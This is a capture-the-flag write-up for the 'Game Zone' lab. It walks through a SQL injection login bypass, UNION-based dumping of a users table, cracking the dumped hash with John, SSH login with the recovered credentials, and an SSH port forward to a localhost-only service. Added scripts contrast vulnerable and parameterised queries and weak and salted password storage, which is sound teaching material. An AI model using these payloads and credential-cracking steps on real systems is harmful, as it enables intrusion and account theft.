Game Zone [SQLi]
Manual SQLi
- Page: [IP:80]
- Bypassing the Login Portal:
' OR 1=1;--
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Login:     | OR 1=1;--                                                                 |
|────────────|───────────────────────────────────────────────────────────────────────────|
| Password:  | ************                                                              |
└────────────┴───────────────────────────────────────────────────────────────────────────┘
- Page: [IP:80/portal.php]
- After the Login we get Presented with a Search Field that lets us Search for different Movies.
- To Discover an Error-Based SQL Injection we need to break the application's SQL Query by submitting characters such as a single quote until the Database returns an Error Message.
- Using:
'
in the Search Field
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | '                                                                         |
|────────────|───────────────────────────────────────────────────────────────────────────|
| Response:  | You have an Error in your SQL Syntax;                                     |
└────────────┴───────────────────────────────────────────────────────────────────────────┘
- Searching for the Correct Number of Columns:
' UNION SELECT 1-- -
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1-- -                                                        |
|────────────|───────────────────────────────────────────────────────────────────────────|
| Response:  | The used SELECT statements have a different Number of Columns             |
└────────────┴───────────────────────────────────────────────────────────────────────────┘
- The Error Disappears once the Column Count matches:
' UNION SELECT 1,2,3-- -
- Correct Number of Columns: 3 (the Page renders Columns 2 and 3, so those are the Positions that display injected Data)
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1,2,3-- -                                                    |
|────────────|───────────────────────────────────┬───────────────────────────────────────|
| Response:  | 2                                 | 3                                     |
└────────────┴───────────────────────────────────┴───────────────────────────────────────┘
- Using
INFORMATION_SCHEMA.tables
which provides Information about all of the Tables:
' UNION SELECT 1,table_schema,table_name FROM information_schema.tables-- -
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1,table_schema,table_name FROM information_schema.tables-- - |
|────────────|───────────────────────────────────┬───────────────────────────────────────|
| Response:  | db                                | post                                  |
|            | db                                | users                                 |
└────────────┴───────────────────────────────────┴───────────────────────────────────────┘
- Using
INFORMATION_SCHEMA.columns
which Returns all the Table and Column Names:
' UNION SELECT 1,table_name,column_name FROM information_schema.columns-- -
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1,table_name,column_name FROM information_schema.columns-- - |
|────────────|───────────────────────────────────┬───────────────────────────────────────|
| Response:  | users                             | username                              |
|            | users                             | pwd                                   |
└────────────┴───────────────────────────────────┴───────────────────────────────────────┘
' UNION SELECT 1, username, pwd FROM users-- -
┌────────────┬───────────────────────────────────────────────────────────────────────────┐
| Search:    | UNION SELECT 1, username, pwd FROM users-- -                              |
|────────────|───────────────────────────────────────────────────────────────────────────|
| USERNAME   | PWD                                                                       |
|────────────|───────────────────────────────────────────────────────────────────────────|
| agent47    | ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14          |
└────────────┴───────────────────────────────────────────────────────────────────────────┘
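The three probes above (a lone quote, a UNION with the wrong column count, and the UNION that reads the users table) all work for one reason: the search term is concatenated into the SQL text. The script below is an added example, not code from the room or this writeup. It builds an in-memory SQLite database whose post and users tables are constructed to mirror the ones enumerated above (the post columns, the rows and the stored hash placeholder are assumptions), runs the page's probe inputs against a search function that concatenates, then runs the same inputs against a parameterised version. SQLite's error strings differ from MySQL's and it has no information_schema, so the two schema-enumeration probes are not replayed, but the sequence is the same: syntax error, column-count error, then users rows appearing inside the search results, while the bound-parameter query treats every probe as a plain pattern and returns nothing.

```python
import sqlite3

# Constructed schema mirroring the two tables the writeup enumerates
# (db.post and db.users). Post columns, rows and the pwd value are assumptions.
SCHEMA = """
CREATE TABLE post (id INTEGER PRIMARY KEY, title TEXT, description TEXT);
CREATE TABLE users (username TEXT, pwd TEXT);
INSERT INTO post (title, description) VALUES
    ('Hitman 2016', 'stealth game'),
    ('Half-Life 2', 'shooter');
INSERT INTO users VALUES ('agent47', '<hash placeholder>');
"""

# The page's probe inputs, in the order the writeup tries them.
PROBE_SYNTAX = "'"
PROBE_COLUMNS = "' UNION SELECT 1-- -"
PROBE_DUMP = "' UNION SELECT 1, username, pwd FROM users-- -"


def open_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, term):
    """Builds the WHERE clause by string formatting: the term becomes part of
    the SQL text, so a quote inside it closes the literal and the rest of the
    input is parsed as SQL."""
    sql = f"SELECT id, title, description FROM post WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn, term):
    """Same query with a bound parameter: the pattern is handed to the engine
    as data after the statement is parsed, so no character in it can change
    the statement's structure."""
    sql = "SELECT id, title, description FROM post WHERE title LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def probe(search, conn, term):
    """Run one input and report either the rows or the engine's error text,
    which is exactly what an error-based probe reads back from a response."""
    try:
        return ("rows", search(conn, term))
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))


if __name__ == "__main__":
    db = open_db()
    for term in (PROBE_SYNTAX, PROBE_COLUMNS, PROBE_DUMP):
        print("vulnerable:", repr(term), probe(search_vulnerable, db, term))
        print("safe:      ", repr(term), probe(search_safe, db, term))
```

The fix is the one-line change from an f-string to a `?` placeholder; the LIKE wildcards are added to the bound value, not to the SQL text, so the same function handles any search term.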
JOHN
- We can Brute-Force the HASH using John (the 64-character hex digest was auto-detected as GOST R 34.11-94):
Loaded 1 password hash (gost, GOST R 34.11-94 [64/64])
videogamer124 (?)
ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 >> videogamer124
- Password: videogamer124
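The digest in the pwd column fell to a wordlist run because it is a single unsalted fast hash: each candidate costs one hash computation, and the same password always produces the same stored value. The script below is an added example (not from the writeup or the room) showing both halves of that lesson: a wordlist check against a constructed unsalted SHA-256 column, and the storage scheme that should replace it, salted PBKDF2-HMAC-SHA256 in a self-describing record. The wordlist, the passwords hashed and the choice of SHA-256 are assumptions; the page's own digest was reported by John as GOST and is not recomputed here.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the one John was run with.
WORDLIST = ["password", "letmein", "videogamer124", "hunter2"]


def legacy_hash(password):
    """Unsalted single SHA-256: a 64-hex digest like the one in users.pwd.
    Assumed for illustration; the page only shows the digest and John's output."""
    return hashlib.sha256(password.encode()).hexdigest()


def wordlist_recover(digest, wordlist):
    """One hash per candidate is the whole cost of an offline guess against an
    unsalted fast hash, which is why a leaked column like this falls in seconds.
    Returns the matching candidate or None."""
    for candidate in wordlist:
        if hmac.compare_digest(legacy_hash(candidate), digest):
            return candidate
    return None


def store_password(password, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256. The record carries scheme, iteration count and
    salt so the work factor can be raised later without a schema change, and two
    users with the same password get different stored values."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(stored, password):
    """Recompute with the parameters embedded in the record; constant-time compare."""
    try:
        scheme, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if scheme != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    leaked = legacy_hash("videogamer124")          # constructed, not the page's digest
    print("legacy column recovered:", wordlist_recover(leaked, WORDLIST))
    record = store_password("videogamer124")
    print("stored record:", record)
    print("verify correct:", verify_password(record, "videogamer124"))
    print("verify wrong:  ", verify_password(record, "videogamer125"))
```

With the PBKDF2 record, each guess costs the full iteration count and the salt forces per-user work, so a dumped column no longer yields passwords with a quick wordlist pass; the iteration count is a tunable and should be set to what the login path can afford.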
SSH Tunneling
- Using the recovered Credentials to Login over SSH: agent47:videogamer124
agent47@gamezone:~$ id
uid=1000(agent47) gid=1000(agent47) groups=1000(agent47),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
- Port 10000 is listening for incoming Connections on all Interfaces (TCP and UDP), while the Database on 127.0.0.1:3306 is bound to localhost only:
agent47@gamezone:~$ netstat -tunlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:10000 0.0.0.0:* -
SSH
- Tunneling from the Server Machine to the Client Machine with local Port Forwarding: the Attacker's local Port 10000 is forwarded through the SSH Session to localhost:10000 on the Server, so the Service becomes reachable at localhost:10000 on the Client.
attacker@machine:~$ ssh -L 10000:localhost:10000 agent47@VICTIM_IP